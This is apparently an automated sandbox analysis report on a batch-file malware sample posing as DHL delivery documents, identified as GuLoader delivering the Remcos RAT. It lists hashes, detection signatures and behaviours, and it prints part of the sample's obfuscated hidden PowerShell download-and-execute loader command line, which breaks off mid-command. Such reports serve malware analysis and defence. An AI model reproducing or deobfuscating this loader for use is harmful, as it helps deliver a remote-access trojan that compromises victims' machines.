Edit tour
Windows
Analysis Report
awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat
Overview
General Information
| Sample name: | awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat |
| Analysis ID: | 1632025 |
| MD5: | 91c8165a5787202c8a3c587ebd54efac |
| SHA1: | f8017746c8d4dfa157332a57bd88457460b5265d |
| SHA256: | 04685d36eaf2a1399f1435d62c1790acda711dce1df22177f36e5f693d25b62a |
| Tags: | batDHLuser-abuse_ch |
| Infos: |   |
 | |
Detection
GuLoader, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6236 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\awb_p ost_dhl_de livery_doc uments_06_ 03_2025_00 0000000002 50506.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 6232 cmdline: powershell .exe -wind owstyle hi dden "echo $Reconjoi n;function Yngve($Sa gan){ .($M iljforandr ingen) ($S agan)} fun ction Free loaded($Kn yttelverse nes){$Unsu ppleness=5 ;do{$Nonor dered+=$Kn yttelverse nes[$Unsup pleness];$ Unsupplene ss+=6;$Gaa rdmand=For mat-List} until(!$Kn yttelverse nes[$Unsup pleness])$ Nonordered }$Stokerfy rene9=Free loaded ' G adeN s eje Mangat Anh y.Retniw'; $Stokerfyr ene9+=Free loaded 'Li thse nalyb Fa erc U m ilPrec.IRa ilrE SlgtN Vid rt';$U dtalendes= Freeloaded 'CommuMSp urro,vulrz in.tiCocc ilBir.mlTr e eaSte,n/ ';$Unsuppl enesschthy ologic=Fre eloaded 'V irtuTTermo lDebats Hu mu1Tusin2' ;$Soejlevi s='Green[G ratiNCentr eM niatHeg em. Ud aSG risgETeate rAfslav Ce lIClaywCF lybyENecta PDionyo Pa naI aarenF ,refTIn,er MDrgniaLuf tfn FednaB eredgRapni e DoveRBre ds]Helli:S moko: port SRestre He lcP.rmuuT alefR Arri iBalbutGas trYSm.lkpP usssRSlave OTyptoT Sy co ffabCB ouiloPleje lB,jle= So li$SkuesU Ss eNtoyma s fteuGa.l opCystep U i.eLTonsiE jejunn Sys tEContrSAr istSO denC Styk hH or tT Ove h e ntyParalOT r efL Veg oBargaGHor teIS ngnc' ;$Udtalend es+=Freelo aded ' Ski 5Ov rk.Je nsp0Eastr Inebr( Rev W.elefiPa ntenGipsud Lemaro Neu rwApotesMa nas Attr N ZamorTgaml e Te.ns1Sp utn0cuiss. Ti.s0Fine s;Torsk Ca dmiWFrakoi Vul,anGaas e6Kreat4,l kef; Stic Uninsx Sla g6,awmo4P two;fort UnchrChefs vCivil:D,n dr1uneat3 ykke4Coshe .Fotog0.it el)Kr ig U dpoGTranse S aftcMusl ikAortooRe tab/Trach2 prin0Skum m1Afrik0Rh amn0Outsp1 cadm0S il l1Be gg Kn ittFUrtepi Avisrefte reNarref K onoInditx S tr/No,s u1Rdbed3 B esk4 Bist. Bukse0';$A bsurdistis k=Freeload ed ' Kom,u Petu,SGear kEPulveR K ell-Gendea ForkoG inu sEPseudNSp herT';$Gig tfebers=Fr eeloaded ' E bothHavm it .wizt i negpRealls Mniac:baa. m/Chi.k/En g lpTapsae ForhnIter odFr,tieAf sp l Purdi RespivAdop teindklr P odoySk alh Nat linde . Har cMi saloD,modm Vog.m/Brug eMS ttiuBi dsar C mpk Alkyde Anc rOv,rc. S ejllMtrikp Tank k Spi c> Natuh B l.et F lct Mhla,pUnde rsA gaa:Ud vik/Deute/ Skol.pMagt eeSkibsn I m rd.ophie AntislD ir yiPa advNo nreeblaakr patriy Rou ,h revolTr skoxSubtrp Medd.Uddi fc DyksoUd slum Hrme/ WolflMReki nuGrororYn dlikT luse Sleskr nde r.Hektol G rnspStridk ';$Delggel sesdrifter s=Freeload ed 'Overd> ';$Miljfor andringen= Freeloaded 'GrublIGr aniE By.aX ';$Adulter ers='samme nbundne';$ Unincrimin ated='\reg nskabsinfo rmationern es.arm';Yn gve (Freel oaded 'Kon tr$ForfagP raecLSemip O ekstbWad inaHjertlC lu r:T ail tEd toRGla nsOD.gteuK epesSacca eLebisR Ca vae Heget la atMor g ENedrySAut op= Toug$O xygaEHisto NA sisVSco re:JutehAP luriPClima pprecodPen n aHjemmtT o liA Disj +Skelg$Son orU ContNU nsi Iu ira NAutenCStn der ,eakiK